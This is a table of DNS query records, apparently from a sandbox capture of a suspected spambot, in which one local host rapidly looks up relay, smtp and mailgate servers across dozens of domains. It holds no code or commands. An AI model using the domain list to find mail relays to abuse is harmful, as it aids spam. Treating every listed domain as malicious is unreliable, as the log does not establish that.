Dec 22, 2023 21:15:10.514230967 CET	192.168.2.4	1.1.1.1	0xabe2	Standard query (0)	relay.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.514230967 CET	192.168.2.4	1.1.1.1	0xca6d	Standard query (0)	relay.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.514514923 CET	192.168.2.4	1.1.1.1	0x200f	Standard query (0)	relay.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.514514923 CET	192.168.2.4	1.1.1.1	0xeb37	Standard query (0)	relay.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.514584064 CET	192.168.2.4	1.1.1.1	0x33d3	Standard query (0)	relay.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.514584064 CET	192.168.2.4	1.1.1.1	0x76bc	Standard query (0)	relay.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.514584064 CET	192.168.2.4	1.1.1.1	0xc745	Standard query (0)	relay.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.514633894 CET	192.168.2.4	1.1.1.1	0x3fab	Standard query (0)	relay.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.514633894 CET	192.168.2.4	1.1.1.1	0xc4f	Standard query (0)	aero4.stememail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.514635086 CET	192.168.2.4	1.1.1.1	0xccf1	Standard query (0)	relay.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.581928968 CET	192.168.2.4	1.1.1.1	0x17ed	Standard query (0)	relay.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.583009005 CET	192.168.2.4	1.1.1.1	0x707d	Standard query (0)	relay.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.583009005 CET	192.168.2.4	1.1.1.1	0x76bd	Standard query (0)	relay.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.583009005 CET	192.168.2.4	1.1.1.1	0x12f0	Standard query (0)	relay.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.620671988 CET	192.168.2.4	1.1.1.1	0xf6bc	Standard query (0)	smtp.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.627243996 CET	192.168.2.4	1.1.1.1	0x4f46	Standard query (0)	relay.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.642569065 CET	192.168.2.4	1.1.1.1	0xa7d9	Standard query (0)	aspmx2.googlemail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.642569065 CET	192.168.2.4	1.1.1.1	0xdc49	Standard query (0)	mx003.netsol.xion.oxcs.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.646270990 CET	192.168.2.4	1.1.1.1	0xc198	Standard query (0)	viruswall.tvs-e.in	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.676841021 CET	192.168.2.4	1.1.1.1	0x19a2	Standard query (0)	relay.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.692648888 CET	192.168.2.4	1.1.1.1	0xbb58	Standard query (0)	smtp.chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.718777895 CET	192.168.2.4	1.1.1.1	0x850a	Standard query (0)	smtp.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.719027042 CET	192.168.2.4	1.1.1.1	0x2f8d	Standard query (0)	smtp.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.728084087 CET	192.168.2.4	1.1.1.1	0xacc7	Standard query (0)	mail.gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.730556965 CET	192.168.2.4	1.1.1.1	0xc122	Standard query (0)	mailgate.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.747304916 CET	192.168.2.4	1.1.1.1	0x707d	Standard query (0)	relay.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.747304916 CET	192.168.2.4	1.1.1.1	0x17ed	Standard query (0)	relay.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.747304916 CET	192.168.2.4	1.1.1.1	0x12f0	Standard query (0)	relay.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.753736973 CET	192.168.2.4	1.1.1.1	0x948b	Standard query (0)	mail.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.756520987 CET	192.168.2.4	1.1.1.1	0x8351	Standard query (0)	mail.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.756520987 CET	192.168.2.4	1.1.1.1	0x4edb	Standard query (0)	mail.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.762866020 CET	192.168.2.4	1.1.1.1	0x59c7	Standard query (0)	mail.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.762866020 CET	192.168.2.4	1.1.1.1	0xc684	Standard query (0)	mail.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.763088942 CET	192.168.2.4	1.1.1.1	0x41f3	Standard query (0)	mail.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.763324022 CET	192.168.2.4	1.1.1.1	0x562b	Standard query (0)	smtp.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.766019106 CET	192.168.2.4	1.1.1.1	0x67cd	Standard query (0)	mail.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.768078089 CET	192.168.2.4	1.1.1.1	0x769d	Standard query (0)	mail.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.771240950 CET	192.168.2.4	1.1.1.1	0xe487	Standard query (0)	smtp.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.771240950 CET	192.168.2.4	1.1.1.1	0xd664	Standard query (0)	smtp.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.771516085 CET	192.168.2.4	1.1.1.1	0xa9f7	Standard query (0)	mail.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.798443079 CET	192.168.2.4	1.1.1.1	0x4f46	Standard query (0)	relay.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.798443079 CET	192.168.2.4	1.1.1.1	0x17ab	Standard query (0)	mail.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.798443079 CET	192.168.2.4	1.1.1.1	0x817b	Standard query (0)	mail.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.798991919 CET	192.168.2.4	1.1.1.1	0xa1da	Standard query (0)	mail.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.800736904 CET	192.168.2.4	1.1.1.1	0x618	Standard query (0)	relay.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.800738096 CET	192.168.2.4	1.1.1.1	0xaa8a	Standard query (0)	smtp.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.800738096 CET	192.168.2.4	1.1.1.1	0xe6ea	Standard query (0)	mail.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.801235914 CET	192.168.2.4	1.1.1.1	0x4c06	Standard query (0)	mail.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.802571058 CET	192.168.2.4	1.1.1.1	0x54d5	Standard query (0)	smtp.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.803163052 CET	192.168.2.4	1.1.1.1	0x4ae5	Standard query (0)	mail.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.803163052 CET	192.168.2.4	1.1.1.1	0xa000	Standard query (0)	mail.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.803164005 CET	192.168.2.4	1.1.1.1	0xf6d8	Standard query (0)	smtp.taylorbryant.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.803518057 CET	192.168.2.4	1.1.1.1	0x5885	Standard query (0)	smtp.select-feeds.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.807248116 CET	192.168.2.4	1.1.1.1	0xebe2	Standard query (0)	mail.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.808448076 CET	192.168.2.4	1.1.1.1	0x3cb6	Standard query (0)	relay.valentinegrowers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.808449030 CET	192.168.2.4	1.1.1.1	0xbff8	Standard query (0)	mail.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.810789108 CET	192.168.2.4	1.1.1.1	0xbacd	Standard query (0)	mail.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.810789108 CET	192.168.2.4	1.1.1.1	0x77e2	Standard query (0)	smtp.9a07f8a339ec2a3e.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.810789108 CET	192.168.2.4	1.1.1.1	0xaef8	Standard query (0)	smtp.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.811110973 CET	192.168.2.4	1.1.1.1	0x9520	Standard query (0)	mail.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.813358068 CET	192.168.2.4	1.1.1.1	0x7fcf	Standard query (0)	smtp.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.827246904 CET	192.168.2.4	1.1.1.1	0x37b	Standard query (0)	smtp.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.827246904 CET	192.168.2.4	1.1.1.1	0x1da3	Standard query (0)	smtp.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.834398031 CET	192.168.2.4	1.1.1.1	0x21ab	Standard query (0)	mail.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.834398031 CET	192.168.2.4	1.1.1.1	0xc0a2	Standard query (0)	mail.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.834398031 CET	192.168.2.4	1.1.1.1	0x2aa0	Standard query (0)	mail.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.835243940 CET	192.168.2.4	1.1.1.1	0x45e5	Standard query (0)	mail.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.856390953 CET	192.168.2.4	1.1.1.1	0xca81	Standard query (0)	smtp.dm.famm.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.862200022 CET	192.168.2.4	1.1.1.1	0xb43f	Standard query (0)	mailgate.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.863245010 CET	192.168.2.4	1.1.1.1	0xb845	Standard query (0)	smtp.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.865230083 CET	192.168.2.4	1.1.1.1	0x9a5	Standard query (0)	smtp.dresslermd.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.881015062 CET	192.168.2.4	1.1.1.1	0xe1e0	Standard query (0)	smtp.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.885212898 CET	192.168.2.4	1.1.1.1	0xc122	Standard query (0)	mailgate.djaskdas.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.888746977 CET	192.168.2.4	1.1.1.1	0x2d4e	Standard query (0)	relay.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.888828039 CET	192.168.2.4	1.1.1.1	0xd765	Standard query (0)	relay.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.924422979 CET	192.168.2.4	1.1.1.1	0x67cd	Standard query (0)	mail.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.924422979 CET	192.168.2.4	1.1.1.1	0x4edb	Standard query (0)	mail.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.924422979 CET	192.168.2.4	1.1.1.1	0x769d	Standard query (0)	mail.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.924643993 CET	192.168.2.4	1.1.1.1	0x562b	Standard query (0)	smtp.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.939243078 CET	192.168.2.4	1.1.1.1	0xda9a	Standard query (0)	mailgate.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.979734898 CET	192.168.2.4	1.1.1.1	0x4ae5	Standard query (0)	mail.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.979808092 CET	192.168.2.4	1.1.1.1	0x4c06	Standard query (0)	mail.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.979808092 CET	192.168.2.4	1.1.1.1	0x618	Standard query (0)	relay.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.979808092 CET	192.168.2.4	1.1.1.1	0xaa8a	Standard query (0)	smtp.bopclip.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.979872942 CET	192.168.2.4	1.1.1.1	0x7fcf	Standard query (0)	smtp.studnets.ocps.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.979872942 CET	192.168.2.4	1.1.1.1	0xbff8	Standard query (0)	mail.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.979929924 CET	192.168.2.4	1.1.1.1	0x45e5	Standard query (0)	mail.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.979929924 CET	192.168.2.4	1.1.1.1	0x21ab	Standard query (0)	mail.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.979929924 CET	192.168.2.4	1.1.1.1	0xebe2	Standard query (0)	mail.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.979964972 CET	192.168.2.4	1.1.1.1	0x1da3	Standard query (0)	smtp.jesusanswwers.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.980659008 CET	192.168.2.4	1.1.1.1	0x37b	Standard query (0)	smtp.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.980659008 CET	192.168.2.4	1.1.1.1	0x598d	Standard query (0)	smtp.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.996736050 CET	192.168.2.4	1.1.1.1	0x60ba	Standard query (0)	relay.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.997958899 CET	192.168.2.4	1.1.1.1	0x636e	Standard query (0)	smtp.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.997958899 CET	192.168.2.4	1.1.1.1	0xf339	Standard query (0)	smtp.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.998172998 CET	192.168.2.4	1.1.1.1	0x100	Standard query (0)	smtp.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.999245882 CET	192.168.2.4	1.1.1.1	0xca50	Standard query (0)	caribbean360-com.p20.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.999861956 CET	192.168.2.4	1.1.1.1	0x62d2	Standard query (0)	smtp.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.011244059 CET	192.168.2.4	1.1.1.1	0xd03d	Standard query (0)	smtp.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.177371025 CET	192.168.2.4	1.1.1.1	0x2d4e	Standard query (0)	relay.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.177402020 CET	192.168.2.4	1.1.1.1	0xda9a	Standard query (0)	mailgate.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.177423954 CET	192.168.2.4	1.1.1.1	0x598d	Standard query (0)	smtp.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.177455902 CET	192.168.2.4	1.1.1.1	0x62d2	Standard query (0)	smtp.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.177567005 CET	192.168.2.4	1.1.1.1	0x100	Standard query (0)	smtp.dinfos.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.177598000 CET	192.168.2.4	1.1.1.1	0xf339	Standard query (0)	smtp.saskgmail.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.177618980 CET	192.168.2.4	1.1.1.1	0xca50	Standard query (0)	caribbean360-com.p20.spamhero.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.177644968 CET	192.168.2.4	1.1.1.1	0x636e	Standard query (0)	smtp.earnmagabucks.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.177656889 CET	192.168.2.4	1.1.1.1	0x60ba	Standard query (0)	relay.hermanassociatesnewyork.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.177681923 CET	192.168.2.4	1.1.1.1	0xd03d	Standard query (0)	smtp.aurora-resorts.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.178138018 CET	192.168.2.4	1.1.1.1	0xd499	Standard query (0)	smtp.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.178541899 CET	192.168.2.4	1.1.1.1	0x6a7d	Standard query (0)	smtp.mercor.compl	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.986294031 CET	192.168.2.4	1.1.1.1	0x7de1	Standard query (0)	smtp.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.017926931 CET	192.168.2.4	1.1.1.1	0xa47e	Standard query (0)	smtp.gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.021842957 CET	192.168.2.4	1.1.1.1	0xec8c	Standard query (0)	pop.pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.029392004 CET	192.168.2.4	1.1.1.1	0xafa2	Standard query (0)	relay.sitehalogen.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.030196905 CET	192.168.2.4	1.1.1.1	0xb469	Standard query (0)	smtp.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.030934095 CET	192.168.2.4	1.1.1.1	0xc301	Standard query (0)	relay.nsorekek.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.129345894 CET	192.168.2.4	1.1.1.1	0xadbe	Standard query (0)	smtp.cominex.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.149132013 CET	192.168.2.4	1.1.1.1	0xd9f0	Standard query (0)	smtp.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.149802923 CET	192.168.2.4	1.1.1.1	0x8801	Standard query (0)	smtp.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.150780916 CET	192.168.2.4	1.1.1.1	0xbf02	Standard query (0)	smtp.hoefakker.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.153481007 CET	192.168.2.4	1.1.1.1	0x1828	Standard query (0)	smtp.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.153994083 CET	192.168.2.4	1.1.1.1	0x9044	Standard query (0)	smtp.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.199743986 CET	192.168.2.4	1.1.1.1	0x53b9	Standard query (0)	mailgate.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.202986956 CET	192.168.2.4	1.1.1.1	0xda9a	Standard query (0)	mailgate.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.203108072 CET	192.168.2.4	1.1.1.1	0xec8c	Standard query (0)	pop.pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.231324911 CET	192.168.2.4	1.1.1.1	0x15f3	Standard query (0)	relay.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.233401060 CET	192.168.2.4	1.1.1.1	0x236c	Standard query (0)	smtp.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.233401060 CET	192.168.2.4	1.1.1.1	0x866b	Standard query (0)	smtp.bilfinger.comqa	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.233689070 CET	192.168.2.4	1.1.1.1	0x66ee	Standard query (0)	smtp.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.234899998 CET	192.168.2.4	1.1.1.1	0xb53c	Standard query (0)	mail.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.279895067 CET	192.168.2.4	1.1.1.1	0x641f	Standard query (0)	smtp.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.283240080 CET	192.168.2.4	1.1.1.1	0x36c8	Standard query (0)	sites.google.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.299273968 CET	192.168.2.4	1.1.1.1	0x98fa	Standard query (0)	smtp.vesond.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.299273968 CET	192.168.2.4	1.1.1.1	0x83e	Standard query (0)	smtp.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.332571983 CET	192.168.2.4	1.1.1.1	0x1828	Standard query (0)	smtp.firsteuropaglobal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.371243954 CET	192.168.2.4	1.1.1.1	0x53b9	Standard query (0)	mailgate.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.372677088 CET	192.168.2.4	1.1.1.1	0x519d	Standard query (0)	smtp.pkmanagment.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.381745100 CET	192.168.2.4	1.1.1.1	0x70b9	Standard query (0)	smtp.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.396147966 CET	192.168.2.4	1.1.1.1	0xb53c	Standard query (0)	mail.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.396147966 CET	192.168.2.4	1.1.1.1	0x66ee	Standard query (0)	smtp.hodginssmithconsulting.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.399249077 CET	192.168.2.4	1.1.1.1	0x2a94	Standard query (0)	smtp.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.399249077 CET	192.168.2.4	1.1.1.1	0x3381	Standard query (0)	smtp.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.454674006 CET	192.168.2.4	1.1.1.1	0x83e	Standard query (0)	smtp.joserafael.com.ve	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.459243059 CET	192.168.2.4	1.1.1.1	0x2ec2	Standard query (0)	mailgate.gn.ais.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.502760887 CET	192.168.2.4	1.1.1.1	0x284	Standard query (0)	smtp.nhclex.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.546576023 CET	192.168.2.4	1.1.1.1	0x2a94	Standard query (0)	smtp.ambquinn.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.546576023 CET	192.168.2.4	1.1.1.1	0x70b9	Standard query (0)	smtp.mobile.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.547244072 CET	192.168.2.4	1.1.1.1	0x4a29	Standard query (0)	smtp.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.591761112 CET	192.168.2.4	1.1.1.1	0x3381	Standard query (0)	smtp.rumbeandoelmundo.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.656017065 CET	192.168.2.4	1.1.1.1	0xf9a7	Standard query (0)	mailgate.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.716926098 CET	192.168.2.4	1.1.1.1	0x4a29	Standard query (0)	smtp.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.727261066 CET	192.168.2.4	1.1.1.1	0x6a74	Standard query (0)	pop3.pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.815248013 CET	192.168.2.4	1.1.1.1	0xf9a7	Standard query (0)	mailgate.srlbonfon9.com.hk	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.840954065 CET	192.168.2.4	1.1.1.1	0xf3e7	Standard query (0)	mailgate.154892628.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.842236042 CET	192.168.2.4	1.1.1.1	0x9c2b	Standard query (0)	smtp.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.865226030 CET	192.168.2.4	1.1.1.1	0xed9	Standard query (0)	relay.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.873502970 CET	192.168.2.4	1.1.1.1	0x6a74	Standard query (0)	pop3.pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.996704102 CET	192.168.2.4	1.1.1.1	0x9c2b	Standard query (0)	smtp.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.028332949 CET	192.168.2.4	1.1.1.1	0xed9	Standard query (0)	relay.buyhits.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.206506014 CET	192.168.2.4	1.1.1.1	0x4fef	Standard query (0)	mailgate.integral-tours.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.207036018 CET	192.168.2.4	1.1.1.1	0xdfa2	Standard query (0)	smtp.williamcroy.plus.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.577449083 CET	192.168.2.4	1.1.1.1	0xb53c	Standard query (0)	mail.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.662580967 CET	192.168.2.4	1.1.1.1	0x6ce8	Standard query (0)	ssh.cicfl.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.714809895 CET	192.168.2.4	1.1.1.1	0x4a29	Standard query (0)	smtp.excursionesmadryn.com.ar	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.715173006 CET	192.168.2.4	1.1.1.1	0x1a1b	Standard query (0)	relay.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.716165066 CET	192.168.2.4	1.1.1.1	0xfdf2	Standard query (0)	mailgate.e-manage.us	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.716521978 CET	192.168.2.4	1.1.1.1	0xa3bd	Standard query (0)	mailgate.acaiforcemaxweightloss.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.917391062 CET	192.168.2.4	1.1.1.1	0x1a1b	Standard query (0)	relay.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.918960094 CET	192.168.2.4	1.1.1.1	0xe3b5	Standard query (0)	mailgate.pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.170566082 CET	192.168.2.4	1.1.1.1	0x8e65	Standard query (0)	mailgate.freedhal.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.171932936 CET	192.168.2.4	1.1.1.1	0x8f19	Standard query (0)	mailgate.chemcaregroup.compg	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.599456072 CET	192.168.2.4	1.1.1.1	0xf197	Standard query (0)	mailgate.piiyuw.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.599813938 CET	192.168.2.4	1.1.1.1	0x3ad1	Standard query (0)	mailgate.rio-perfume.orgua	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.781625032 CET	192.168.2.4	1.1.1.1	0x151d	Standard query (0)	mailgate.enhancementsmast.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.782480001 CET	192.168.2.4	1.1.1.1	0x3d0e	Standard query (0)	mailgate.arbsdecq.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.794992924 CET	192.168.2.4	1.1.1.1	0x6b2b	Standard query (0)	mailgate.select-feeds.com	A (IP address)	IN (0x0001)	false
